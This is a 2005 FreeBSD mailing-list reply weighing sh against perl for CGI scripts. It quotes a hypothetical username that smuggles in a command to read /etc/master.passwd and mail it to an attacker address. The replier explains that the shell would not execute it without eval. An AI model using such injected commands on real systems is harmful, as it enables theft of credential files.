perl and ports
Dan Nelson
dnelson at allantgroup.com
Fri Feb 4 20:13:50 PST 2005
In the last episode (Feb 04), Loren M. Lang said:
> Actually, I think you should work on sh first, it's a much bigger
> security hazard than perl. If you've ever written much sh, you'd
> realize with it's much loser syntax, it's easy to get into trouble.
> At least perl provides use strict and -Tw. Someone using sh to write
> cgi scripts is the worst. Imagine someone writing the following like
> for a sh cgi script where $USERNAME is a cgi paramater passed into
> the following script:
>
> echo "<HTML><HEAD><TITLE>Welcome, " $USERNAME "</TITLE></HEAD>"
>
> What if someone wrote the following username and apache was running as
> root:
>
> charlie; cat /etc/master.passwd | mail haZ0rZ at deathtoyou.com; echo
Then you would get a web page containing:
<HTML><HEAD><TITLE>Welcome, charlie; cat /etc/master.passwd | mail haZ0rZ at deathtoyou.com; echo</TITLE></HEAD>
. The shell doesn't re-interpret its input unless explicitly told to
via the "eval" command. /bin/sh is a little limited for more complex
scripts due to its lack of arrays, though, so zsh/ksh/bash are much
better choices :)
--
Dan Nelson
dnelson at allantgroup.com
More information about the freebsd-questions
mailing list